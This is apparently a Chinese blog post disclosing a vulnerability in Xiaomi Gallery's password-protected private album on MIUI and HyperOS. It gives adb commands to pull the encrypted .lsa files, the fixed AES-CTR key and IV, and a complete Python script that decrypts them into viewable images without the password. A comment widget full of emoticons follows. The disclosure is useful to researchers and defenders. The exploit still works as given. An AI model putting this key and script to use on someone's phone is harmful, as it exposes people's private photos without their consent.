小米相册-隐私相册绕过密码直接查看隐私图片

小米相册隐私相册漏洞

截至目前(2024/06/24),在MIUI、HyperOS中均可复现

操作步骤

1、adb连接手机使用adb pull命令将/storage/emulated/0/MIUI/Gallery/cloud/secretAlbum/路径下所有加密文件*.lsa拉取到本地
2、使用解密脚本将lsa文件.lsa进行解密

加密方式为AES-CTR加密模式,无填充
密钥key为固定值3082046C30820354A003020102020900
IV为11132123313341435153616667687172

# coding:utf-8
import os
from Crypto.Cipher import AES
import binascii
# 给定的密钥和IV
key_hex = "3082046C30820354A003020102020900"
iv_hex = "11132123313341435153616667687172"

# 读取二进制文件内容
def read_binary_file(file_path):
    with open(file_path, 'rb') as file:
        return file.read()

# 写入解密后的文件内容
def write_binary_file(file_path, data):
    with open(file_path, 'wb') as file:
        file.write(data)

# 将十六进制字符串转换为字节
def hex_to_bytes(hex_str):
    return binascii.unhexlify(hex_str)

# AES-CTR解密函数
def aes_ctr_decrypt(ciphertext, key, iv):
    cipher = AES.new(key, AES.MODE_CTR, nonce=iv[:8], initial_value=iv[8:])
    return cipher.decrypt(ciphertext)

# 将密钥和IV转换为字节
key = hex_to_bytes(key_hex)
iv = hex_to_bytes(iv_hex)

files = [f for f in os.listdir(".\in") if os.path.isfile(os.path.join(".\in", f))]
for file in files:
    # 读取二进制文件内容
    ciphertext = read_binary_file(os.path.join(".\in", file))
    # 解密文件
    plaintext = aes_ctr_decrypt(ciphertext, key, iv)
    # 将解密后的内容写入新文件
    output_file_path = os.path.join(".\out", file.replace(".lsa",".jpg"))
    write_binary_file(output_file_path, plaintext)
    print(f"{file}解密完成->{output_file_path}")

解密效果

file

小米相册隐私相册提取解密

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇